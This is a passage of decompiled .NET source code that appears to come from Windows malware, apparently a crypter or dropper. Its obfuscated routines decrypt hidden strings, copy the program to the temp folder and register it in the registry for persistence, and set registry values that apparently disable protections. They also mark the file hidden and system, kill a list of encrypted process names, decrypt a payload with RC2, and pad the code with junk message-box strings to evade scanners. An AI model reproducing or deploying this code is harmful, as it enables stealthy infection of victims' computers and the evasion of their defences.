RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(225)) + "kxe" + Conversions.ToString(Strings.Chr(184)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(244)) + Conversions.ToString(Strings.Chr(186)) + "l" + Conversions.ToString(Strings.Chr(190)) + "{" + Conversions.ToString(Strings.Chr(132)) + Conversions.ToString(Strings.Chr(160)) + Conversions.ToString(Strings.Chr(142)) + "P\u001C" + Conversions.ToString(Strings.Chr(243)) + Conversions.ToString(Strings.Chr(132)) + "D" + Conversions.ToString(Strings.Chr(242)) + Conversions.ToString(Strings.Chr(160)) + Conversions.ToString(Strings.Chr(146)) + Conversions.ToString(Strings.Chr(156)) + "(" + Conversions.ToString(Strings.Chr(204)) + Conversions.ToString(Strings.Chr(235)) + Conversions.ToString(Strings.Chr(198)) + Conversions.ToString(Strings.Chr(151)) + "*" + Conversions.ToString(Strings.Chr(198)) + "1" + Conversions.ToString(Strings.Chr(199)) + Conversions.ToString(Strings.Chr(186)) + Conversions.ToString(Strings.Chr(137)) + "f" + Conversions.ToString(Strings.Chr(150)) + "\u0003{" + Conversions.ToString(Strings.Chr(206)) + Conversions.ToString(Strings.Chr(195)) + "\u001E\u0014s" + Conversions.ToString(Strings.Chr(136)) + Conversions.ToString(Strings.Chr(166))), true);
registryKey.SetValue(RjpBKtyoXKovFnX, (object) (Path.GetTempPath() + RFxHQxRvBmidXoU), RegistryValueKind.String);
registryKey.Close();
try
{
File.Copy(this.ndnmrvXfvEtRnGWDjtjqaPE, Path.GetTempPath() + RFxHQxRvBmidXoU, true);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
object obj;
return obj;
}
private object cvGqHnmUkvCkHFuKRHnFvee()
{
try
{
MyProject.Computer.Registry.SetValue(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(250)) + "O[H" + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(211)) + Conversions.ToString(Strings.Chr(141)) + "b" + Conversions.ToString(Strings.Chr(182)) + "\\" + Conversions.ToString(Strings.Chr(179)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(180)) + "p6" + Conversions.ToString(Strings.Chr(199)) + Conversions.ToString(Strings.Chr(172)) + "K" + Conversions.ToString(Strings.Chr(202)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(136)) + Conversions.ToString(Strings.Chr(143)) + "&" + Conversions.ToString(Strings.Chr(201)) + Conversions.ToString(Strings.Chr(253)) + Conversions.ToString(Strings.Chr(198)) + Conversions.ToString(Strings.Chr(132)) + "0" + Conversions.ToString(Strings.Chr(216)) + "*" + Conversions.ToString(Strings.Chr(193)) + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(152)) + "C" + Conversions.ToString(Strings.Chr(175)) + "<a" + Conversions.ToString(Strings.Chr(196)) + Conversions.ToString(Strings.Chr(222)) + "\u001F;N" + Conversions.ToString(Strings.Chr(155)) + Conversions.ToString(Strings.Chr(188)) + Conversions.ToString(Strings.Chr(225)) + Conversions.ToString(Strings.Chr(134)) + "EL" + Conversions.ToString(Strings.Chr(200)) + "uY;C\\\u0012" + Conversions.ToString(Strings.Chr(199)) + "FEP"), this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(246)) + "mmp" + Conversions.ToString(Strings.Chr(173)) + Conversions.ToString(Strings.Chr(128)) + Conversions.ToString(Strings.Chr(227)) + Conversions.ToString(Strings.Chr(156)) + "}" + Conversions.ToString(Strings.Chr(183))), (object) RegistryValueKind.DWord);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
private object RXXeGpqoUgCmIipoOOesgoC()
{
try
{
MyProject.Computer.Registry.SetValue(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(250)) + "O[H" + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(211)) + Conversions.ToString(Strings.Chr(141)) + "b" + Conversions.ToString(Strings.Chr(182)) + "\\" + Conversions.ToString(Strings.Chr(179)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(180)) + "p6" + Conversions.ToString(Strings.Chr(199)) + Conversions.ToString(Strings.Chr(172)) + "K" + Conversions.ToString(Strings.Chr(202)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(136)) + Conversions.ToString(Strings.Chr(143)) + "&" + Conversions.ToString(Strings.Chr(201)) + Conversions.ToString(Strings.Chr(253)) + Conversions.ToString(Strings.Chr(198)) + Conversions.ToString(Strings.Chr(153)) + "6" + Conversions.ToString(Strings.Chr(215)) + "1" + Conversions.ToString(Strings.Chr(205)) + Conversions.ToString(Strings.Chr(167)) + Conversions.ToString(Strings.Chr(146)) + "V" + Conversions.ToString(Strings.Chr(135)) + "-_" + Conversions.ToString(Strings.Chr(206)) + Conversions.ToString(Strings.Chr(194)) + "\u0014'V" + Conversions.ToString(Strings.Chr(142)) + Conversions.ToString(Strings.Chr(148)) + Conversions.ToString(Strings.Chr(254)) + Conversions.ToString(Strings.Chr(164)) + "^P" + Conversions.ToString(Strings.Chr(201)) + "tZ\u001Ez}\u0018" + Conversions.ToString(Strings.Chr(221)) + "]Na" + Conversions.ToString(Strings.Chr(249)) + Conversions.ToString(Strings.Chr(201)) + "W/" + Conversions.ToString(Strings.Chr(171)) + "\u007F_&k" + Conversions.ToString(Strings.Chr(176)) + Conversions.ToString(Strings.Chr(140)) + "Y" + Conversions.ToString(Strings.Chr(134)) + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(190))), this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(246)) + "mmp" + Conversions.ToString(Strings.Chr(173)) + Conversions.ToString(Strings.Chr(128)) + Conversions.ToString(Strings.Chr(227)) + Conversions.ToString(Strings.Chr(139)) + "Q" + Conversions.ToString(Strings.Chr(128)) + "y" + Conversions.ToString(Strings.Chr(170)) + Conversions.ToString(Strings.Chr(181)) + Conversions.ToString(Strings.Chr(147))), (object) RegistryValueKind.DWord);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
private object bJwQqmrhNCUHsooEXOHZEXb()
{
try
{
MyProject.Computer.Registry.SetValue(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(250)) + "O[H" + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(211)) + Conversions.ToString(Strings.Chr(141)) + "b" + Conversions.ToString(Strings.Chr(182)) + "\\" + Conversions.ToString(Strings.Chr(179)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(180)) + "p6" + Conversions.ToString(Strings.Chr(199)) + Conversions.ToString(Strings.Chr(172)) + "K" + Conversions.ToString(Strings.Chr(202)) + Conversions.ToString(Strings.Chr(175)) + Conversions.ToString(Strings.Chr(136)) + Conversions.ToString(Strings.Chr(143)) + "&" + Conversions.ToString(Strings.Chr(201)) + Conversions.ToString(Strings.Chr(253)) + Conversions.ToString(Strings.Chr(198)) + Conversions.ToString(Strings.Chr(153)) + "6" + Conversions.ToString(Strings.Chr(215)) + "1" + Conversions.ToString(Strings.Chr(205)) + Conversions.ToString(Strings.Chr(167)) + Conversions.ToString(Strings.Chr(146)) + "V" + Conversions.ToString(Strings.Chr(135)) + "-_" + Conversions.ToString(Strings.Chr(206)) + Conversions.ToString(Strings.Chr(194)) + "\u0014'V" + Conversions.ToString(Strings.Chr(142)) + Conversions.ToString(Strings.Chr(148)) + Conversions.ToString(Strings.Chr(254)) + Conversions.ToString(Strings.Chr(164)) + "^P" + Conversions.ToString(Strings.Chr(201)) + "tZ\u001Ez}\u0018" + Conversions.ToString(Strings.Chr(221)) + "]Na" + Conversions.ToString(Strings.Chr(249)) + Conversions.ToString(Strings.Chr(201)) + "W/" + Conversions.ToString(Strings.Chr(171)) + "\u007F_&k" + Conversions.ToString(Strings.Chr(176)) + Conversions.ToString(Strings.Chr(140)) + "Y" + Conversions.ToString(Strings.Chr(134)) + Conversions.ToString(Strings.Chr(144)) + Conversions.ToString(Strings.Chr(190))), this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(246)) + "mmp" + Conversions.ToString(Strings.Chr(173)) + Conversions.ToString(Strings.Chr(128)) + Conversions.ToString(Strings.Chr(227)) + Conversions.ToString(Strings.Chr(141)) + "U" + Conversions.ToString(Strings.Chr(148)) + "{" + Conversions.ToString(Strings.Chr(148)) + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(147)) + "Z'" + Conversions.ToString(Strings.Chr(250)) + Conversions.ToString(Strings.Chr(159)) + "t" + Conversions.ToString(Strings.Chr(214))), (object) RegistryValueKind.DWord);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
private object GcgXojEaFPbweNAQSKGPfDl()
{
try
{
File.SetAttributes(this.ndnmrvXfvEtRnGWDjtjqaPE, FileAttributes.Hidden | FileAttributes.System);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
private object JifTRmpsoLwDgKYvqYDjDUn()
{
Process[] processesByName1 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(225)) + "fwt" + Conversions.ToString(Strings.Chr(156)) + Conversions.ToString(Strings.Chr(154)) + Conversions.ToString(Strings.Chr(229))));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(225)) + "fwt" + Conversions.ToString(Strings.Chr(140)) + Conversions.ToString(Strings.Chr(152)) + Conversions.ToString(Strings.Chr(244)) + Conversions.ToString(Strings.Chr(179))));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
Process[] processesByName3 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(228)) + "Fqi" + Conversions.ToString(Strings.Chr(188)) + Conversions.ToString(Strings.Chr(137)) + Conversions.ToString(Strings.Chr(244)) + Conversions.ToString(Strings.Chr(169)) + "Y" + Conversions.ToString(Strings.Chr(144)) + "w"));
int index3 = 0;
while (index3 < processesByName3.Length)
{
processesByName3[index3].Kill();
checked { ++index3; }
}
Process[] processesByName4 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(196)) + "iip" + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(137)) + Conversions.ToString(Strings.Chr(245)) + Conversions.ToString(Strings.Chr(186)) + "B" + Conversions.ToString(Strings.Chr(133)) + "{" + Conversions.ToString(Strings.Chr(132)) + Conversions.ToString(Strings.Chr(183))));
int index4 = 0;
while (index4 < processesByName4.Length)
{
processesByName4[index4].Kill();
checked { ++index4; }
}
Process[] processesByName5 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(214)) + "|zx" + Conversions.ToString(Strings.Chr(174)) + Conversions.ToString(Strings.Chr(139))));
int index5 = 0;
while (index5 < processesByName5.Length)
{
processesByName5[index5].Kill();
checked { ++index5; }
}
Process[] processesByName6 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(197)) + "mlt" + Conversions.ToString(Strings.Chr(188)) + Conversions.ToString(Strings.Chr(132)) + Conversions.ToString(Strings.Chr(231)) + Conversions.ToString(Strings.Chr(173)) + "["));
int index6 = 0;
while (index6 < processesByName6.Length)
{
processesByName6[index6].Kill();
checked { ++index6; }
}
Process[] processesByName7 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(196)) + "iip" + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(137))));
int index7 = 0;
while (index7 < processesByName7.Length)
{
processesByName7[index7].Kill();
checked { ++index7; }
}
Process[] processesByName8 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(221)) + "hrh" + Conversions.ToString(Strings.Chr(171)) + Conversions.ToString(Strings.Chr(142)) + Conversions.ToString(Strings.Chr(225))));
int index8 = 0;
while (index8 < processesByName8.Length)
{
processesByName8[index8].Kill();
checked { ++index8; }
}
Process[] processesByName9 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(196)) + "mle" + Conversions.ToString(Strings.Chr(186)) + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(234)) + Conversions.ToString(Strings.Chr(189)) + "_" + Conversions.ToString(Strings.Chr(139))));
int index9 = 0;
while (index9 < processesByName9.Length)
{
processesByName9[index9].Kill();
checked { ++index9; }
}
Process[] processesByName10 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(218)) + "mtp" + Conversions.ToString(Strings.Chr(172)) + Conversions.ToString(Strings.Chr(135)) + Conversions.ToString(Strings.Chr(242)) + Conversions.ToString(Strings.Chr(183)) + "Y" + Conversions.ToString(Strings.Chr(128))));
int index10 = 0;
while (index10 < processesByName10.Length)
{
processesByName10[index10].Kill();
checked { ++index10; }
}
Process[] processesByName11 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(211)) + "jks" + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(159))));
int index11 = 0;
while (index11 < processesByName11.Length)
{
processesByName11[index11].Kill();
checked { ++index11; }
}
Process[] processesByName12 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(211)) + "jks" + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(159)) + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(237))));
int index12 = 0;
while (index12 < processesByName12.Length)
{
processesByName12[index12].Kill();
checked { ++index12; }
}
Process[] processesByName13 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(217)) + "agb" + Conversions.ToString(Strings.Chr(172)) + Conversions.ToString(Strings.Chr(158)) + Conversions.ToString(Strings.Chr(231)) + Conversions.ToString(Strings.Chr(178)) + "R" + Conversions.ToString(Strings.Chr(159)) + "w" + Conversions.ToString(Strings.Chr(149))));
int index13 = 0;
while (index13 < processesByName13.Length)
{
processesByName13[index13].Kill();
checked { ++index13; }
}
Process[] processesByName14 = Process.GetProcessesByName(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(216)) + "k{s" + Conversions.ToString(Strings.Chr(160)) + Conversions.ToString(Strings.Chr(148))));
int index14 = 0;
while (index14 < processesByName14.Length)
{
processesByName14[index14].Kill();
checked { ++index14; }
}
object obj;
return obj;
}
private byte[] TUGGEjqkhdQUTQXLCYdPZEP(Stream fDQofwUuYVBnHVG)
{
int int32 = Convert.ToInt32(fDQofwUuYVBnHVG.Length);
byte[] buffer = new byte[checked (int32 + 1)];
fDQofwUuYVBnHVG.Read(buffer, 0, int32);
fDQofwUuYVBnHVG.Close();
return buffer;
}
public string SevdniwAKhioHCREIfujevM(string OnAQjtuvLvRQpWZCE)
{
string str1 = "IZOwndEWSMqepsgkGUFjZRA";
int index1 = 0;
int index2 = 0;
StringBuilder stringBuilder = new StringBuilder();
string empty = string.Empty;
int[] numArray1 = new int[257];
int[] numArray2 = new int[257];
int length = str1.Length;
int location1 = 0;
while (location1 <= (int) byte.MaxValue)
{
char String = str1.Substring(location1 % length, 1).ToCharArray()[0];
numArray2[location1] = Strings.Asc(String);
numArray1[location1] = location1;
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
int index3 = 0;
int location2 = 0;
while (location2 <= (int) byte.MaxValue)
{
index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256;
int num = numArray1[location2];
numArray1[location2] = numArray1[index3];
numArray1[index3] = num;
Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1));
}
int location3 = 1;
while (location3 <= OnAQjtuvLvRQpWZCE.Length)
{
index1 = checked (index1 + 1) % 256;
index2 = checked (index2 + numArray1[index1]) % 256;
int num1 = numArray1[index1];
numArray1[index1] = numArray1[index2];
numArray1[index2] = num1;
int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256];
int CharCode = Strings.Asc(OnAQjtuvLvRQpWZCE.Substring(checked (location3 - 1), 1).ToCharArray()[0]) ^ num2;
stringBuilder.Append(Strings.Chr(CharCode));
Math.Max(Interlocked.Increment(ref location3), checked (location3 - 1));
}
string str2 = stringBuilder.ToString();
stringBuilder.Length = 0;
return str2;
}
private byte[] ParrEopthTArjooCKMhseYj(Stream stream)
{
int int32 = Convert.ToInt32(stream.Length);
byte[] buffer = new byte[checked (int32 + 1)];
stream.Read(buffer, 0, int32);
stream.Close();
return buffer;
}
public byte[] tVjpoufrKfCfDJKBWirZOSi(byte[] CLMKPmszer, string dugkLkvqIG)
{
RC2CryptoServiceProvider cryptoServiceProvider1 = new RC2CryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
byte[] numArray;
try
{
byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(dugkLkvqIG));
cryptoServiceProvider1.Key = hash;
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = CLMKPmszer;
numArray = decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return numArray;
}
public byte[] htDdmvkOrQChFmEfSpiPvcH(byte[] CLMKPmszer, string dugkLkvqIG)
{
RC2CryptoServiceProvider cryptoServiceProvider1 = new RC2CryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
byte[] numArray;
try
{
byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(dugkLkvqIG));
cryptoServiceProvider1.Key = hash;
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = CLMKPmszer;
numArray = decryptor.TransformFinalBlock(inputBuffer, 0, checked (inputBuffer.Length - 1));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return numArray;
}
public string MQkklstIjeKaoLOsOlgFZIR(string eSQKcZvSqw)
{
string str1 = Strings.StrReverse(eSQKcZvSqw);
string str2 = "";
int num = Strings.Len(str1);
int Start = 1;
while (Start <= num)
{
str2 += Conversions.ToString(Strings.Chr(checked (Strings.Asc(Strings.Mid(str1, Start, 1)) - 103)));
checked { ++Start; }
}
return str2;
}
public string BpEYjtBcTPJcqnIZLsXsKSn(string ffg)
{
string str1 = "";
int num = Strings.Len(ffg);
for (int Start = 1; Start <= num; Start = checked (Start + 1 + 1))
{
string str2 = Strings.Mid(ffg, Start, 2);
str1 += Conversions.ToString(Strings.Chr(checked ((int) Math.Round(Conversion.Val("&h" + str2)))));
}
return str1;
}
public string DuDULwluFLegskgHiJUQfjp(string StKmTsqKHPhMDFLRtubHVWJELlGDuuJZNNyjNm)
{
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
int num3 = (int) Interaction.MsgBox((object) "fBGGwGARzzQtSWoQjeCevENFOZqTstekNlENdFKPcEtmENQrunKNbQTTZlelmTgoTPezhGcBBgOSqPVtnKlDKmKRPbsdNqiRdPTXKDrXImYrMyjlOBMCZEKBOoN");
int num4 = (int) Interaction.MsgBox((object) "VNNqdRrSZteSxVTxgOWKwacaJXwHGKJDdinpReUsdBCIvzqsKjyFFcrPSdghceIgBCQmKQSMBDeQqALSIpccRPQlizSTVlcFmdqCwIipADlaWZlFGKbksgrEPkd");
int num5 = (int) Interaction.MsgBox((object) "GVJFGVYkJywJawTEPVpeqiNGOgOgWUdNNsajVYoolxQYBGmjFBwipTqWcKWgDhRWPKFwfFKcNtBtDQPgXdcwagCvdooQrlshVbCTVHiaYxbMXlWGRmfKbHgeLiXMIVmwcF");
label_1:
int num6 = (int) Interaction.MsgBox((object) "fVLmPZpvaDnRdMcOwfJPWrcNdXtCLvdYzIFpOfBYFpjIcRppmaDqdhGXSaLWHmpSuNImhmznOvPWfFcbJDlCmNpIfNRNZYUKZGiBWUriMyOEtgweLNUWTDRdKC");
int num7 = (int) Interaction.MsgBox((object) "tsLpBgRXSzcMwkRRbbMhmoJARGwizkvuDVJDrcmnqcBOYIhPClWtlklfBfqEXqhSveMFNAmXsdRKSCJDidZsZsfpGpZMfFaczYNHvirCbLQTVEUSCjTTQHUVTuohiQvUQszLkMWSMBHPZQRlZrXeRGUhyHsvPxMjcnThmNwKhzkMn");
int num8 = (int) Interaction.MsgBox((object) "KjFppqJYassWrRMyTcRhkqCPcAXQHbOtLmPLpZnpUyoqWownefrJMGyuBRxSeAzQobbksrNnHnPXtYiCKQxFdmNdPiZDSvlnaBuBgMrkMnXYSSFZezVOYwFrzzSFXB");
int num9 = (int) Interaction.MsgBox((object) "KQHCVdCnSkyNRgoNKhHIuniROEYrNmnPFruzzgaPpKBRPGOqUYcLlHnIZStBdRfwlYYnTarfLzZWYJQyFyMmXGUgBvgSinLbkQmflkTWOEOrBRRXzHEzLKxacpjGlbzsjRhrKodeibPoGGlEmCBNKvtfkCufuKRlRgEkyNqqzRXewDugy");
int num10 = (int) Interaction.MsgBox((object) "JxmaUHsNNaGiikdZrSTBdVmbgruzbVcMYvSEXenxsgHdCKDyVcwtZSnBWULIoXDrQVipSlpaGwosalmJBvPfytLVuPlyQudjikrJaRgyznJEYDMJekenVpqjtrezbcmqVD");
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
goto label_1;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
string str1;
string str2 = str1;
if (num2 == 0)
return str2;
ProjectData.ClearProjectError();
return str2;
}
public string ACtvUsGptTbweZCTQBnPPMl(string FgsaXBZOOSMWJMp)
{
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
int num3 = (int) Interaction.MsgBox((object) "aVfzwCNlydKgLFsDxDtidHtzjnedDYzzLzsYtFcXxFCfkRIFDADuSOEfFekTMMqCXMNkqRcQnUxkGwimezXrPINdozUlBWhUyrtdEvolLDwoqBvVQhCTjywOWeiajLxYeXlvzpD");
int num4 = (int) Interaction.MsgBox((object) "gHtovaXRkDOihjPJeiKKgaBrXwLIyFmeBOdYdSUByEebeNSecKNtvftxWlgmQdtyzmyBDyFSEMhylBXUSnbdrbxTWzzCIjaGRPdWKdTYEGRzfjcnIeVn");
int num5 = (int) Interaction.MsgBox((object) "RkiUSJwfprLJyrslSsdbXWeWxavGHOlccONepknCnyntychdLFQtbkPrIZysJaENulcyxTSUQfzmmLrUToAgkxPefEaXsuwiICwesoblwXJCYaGDBKImrhec");
int num6 = (int) Interaction.MsgBox((object) "EMRQolfgmTOCVlPETusVifUARUqfSLrLhIrHVWiDjiwWMYaDcFEGMeMLeteoTXOjyCiKfkMGDxvFUVTRCcsYLhDjTETHEtQeKWMOBdPDBlg");
int num7 = (int) Interaction.MsgBox((object) "kWPKAJRckCDeNkRMHrwnwlpsmEcNrKONdFapVScfakukIMDBpliXHFbyaZQIaAOrySNEMwTWMSFWumNVWPJOKZODnPlaaDmrcxDyBNOOalTotQnSNJRSSrtZuflsXQ");
int num8 = (int) Interaction.MsgBox((object) "leasQgCYDsJoJjaiPLbEvBOYAPEYvEbwWylDQrqsqxtshOkDCHOLLvIGBMRYlMIjOKiMhQEBVpdFnJOgdydBnUccatsebjBcWvpDkswFbqzQBMMIsvwPFYhMNLCOfFubpz");
int num9 = (int) Interaction.MsgBox((object) "UcuNESDOrzhRWxikOswNnSkoYQyiGlpHtImotgIXOPlOgGyeiUQRRpChGbqhXrMbbiqvSfBTwInRtFvFDNTJpXAvugMKTValEnPHpvInYfNPlaqzgyKxmuujQBAxvTtrBuwFM");
int num10 = (int) Interaction.MsgBox((object) "LAwvnAMPvxcTBolyxDzHuMoDbNDQaTxPwLPwUIqdzsSRtESUjtiqfkbWYLrDFAkzyiJhIENbTIKYWZzEtZHVtoiwRjUkQDYvhaFXsYfBPBfKZghwrEvQ");
int num11 = (int) Interaction.MsgBox((object) "FowLceQlKVqoqcichrqVXYuVrPmMjKvGwulSioLlNJkUrRBqczOHWGtnjSbIkuScLekWxWUxuVMJCgrxNccnWhnwpJWHhTtELekYpBHFGZeaDbMaWiOJK");
int num12 = (int) Interaction.MsgBox((object) "VRjBqKIfIDCpUMMUWzkCdWxnKctafbhQGUCRdnBTszTdtVpRiCKfoOGLuCemqGEOYlqlVPMPUfsFOFGNKXsuxUipeqlyRCpioaadHWtMCEArTwLDQULTvYgScBp");
int num13 = (int) Interaction.MsgBox((object) "fIsSDWQPVFZfRHIUkCmDjQZWITzIVcBdtYbWVhqRiNIBiNbJmiePjLBxFGAKFJxRGEcpGCCWybotBYtOHXOOjTEMyQzdzZFeHjuTZncFdUAmvlDkAqwxxHkdeyKSg");
int num14 = (int) Interaction.MsgBox((object) "jksVjOpyHiQadizqqZqZaeYFJLpjEndVCtdbaKoiCCyGyhSlJQliQHjpLnEBYYuBRaJLujRwXJhuHgBvsVCrSSKniTVYmmpIRMlTGuyKGkUnRlcrgXqxsSeWOlqxKlqLr");
label_1:
int num15 = (int) Interaction.MsgBox((object) "ePuXWROvRGsoPszjvHvmZTdybRgEXGwaaNviFcXobTEtjsyYQvGHBqgPwKQrgXxILJSSqLyeGchwOjfLGNoOZrNTsBEwOnOZYtDsNzYhJcyuWGfEtDKOeNuhUMuGsaZTNGSxJZtBbg");
int num16 = (int) Interaction.MsgBox((object) "WvpCofhywfhQOGcjYNRzpiJYdBSUkEzVFoZTCoKSCILEpRfVbOoMUxEZTDnbKzDkiwgIDWFzFEFVoVObkJoBelpODmdmiMVWEjKsjbyzQrnjMPtJaTGBUsgBIWckHkQpwXBExxDbJqzaMshbbPgtsPrtKcXDhQBvlgtatgkmOWceotlMRANAwkzkaFaL");
int num17 = (int) Interaction.MsgBox((object) "axAGfjDVYaCvsitwdWuGiaxWdcqFurYtlFZVSgDGXbnaFRMgSxZqPwYZjpCSYWLmmadPjNvoxbPSLyNpGjHRJrwSKqHhtToeKymWlTpjDWiKQUuWEbRMNxpuOCLoegNeazBwuvPKDlJ");
int num18 = (int) Interaction.MsgBox((object) "VDiZuBnflQwPNDrXXqrpineHywuxfCmEePgmoYLtyVDcXforiFNmFgUZgzoEpnsCjDKTnrIwFGgqsoGNyPHdFCoUrcVNHKxQEIDWnUnQaMMGUrBOqLHReQtTCUXYdkKXKSsvjXHcgaeawEgUdhuDWlrziQboyalxWWMtWNZHrnQAVpGIhREodasmDDQLMwkSK");
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
goto label_1;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
string str1;
string str2 = str1;
if (num2 == 0)
return str2;
ProjectData.ClearProjectError();
return str2;
}
public string RpNbSJrtFTCgdXBESpGGRMt(string QqZfqkvWNqWXnuo)
{
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
int num3 = (int) Interaction.MsgBox((object) "KZnakGfxhiBhsXhGmGDnPToccBuRCKaIlyGvxyNNucciEvqxMnfoRytiwftCoOZkhacTRjhhEszIGLkwZYJyEiuPDIMvUxsQfIyHznHwshNWFvitFPigkLJhkuICpBo");
int num4 = (int) Interaction.MsgBox((object) "boKNTkRecxdHRVvNpqiPxpZkZLXYacglfmkkOLnUHhvFvyQtvSPqeXPkQxmmLPltvKNoshXBvPMdrMcXynevJaTfFxjGdvAkOcyUqYrGpFUVURzyvWvquJtaKMyjcqhoJ");
int num5 = (int) Interaction.MsgBox((object) "VBBgWwarMbDRQnIywYfPRaDQLOlhdUEpjeIoSAtvWgjthuXGangSjugWVCXVSqetdfIbnqQztOsvmyGPKyJDPkIurQvNHUurDzSALmhmdTvfHUJBdfl");
label_1:
int num6 = (int) Interaction.MsgBox((object) "dpwXtgauNbsscPkyUVnGGLAvmzkGTczqyvfxnOgnFOnRkjGhqdKcsUCNOkjyemtkldBbdOXvramPJNbGUqWrGHMVgMUtsDgLpXBgDVFnkgUYNLzgHrjPIoyJVilGPCiIteZaWKBFSfgGGFxwkfs");
int num7 = (int) Interaction.MsgBox((object) "wJUrThsHjTyHyqzSsyVdxmKOpRHUtJiywpkbfHwOIFMwlOWVVzGHFbzSGiNpUXRZnLpDZsdzNOWNDMjRhSDLBQDtUXMtEYOBaenLRIBfwVWHLGvHDJErgqgLmyxFoEFWiztwFIIsFGlGmJwfJSAmzhTQcSOeuxnfmvjokwKjqWVIRMIilaOrwxuOvQHlSCMnNYwhu");
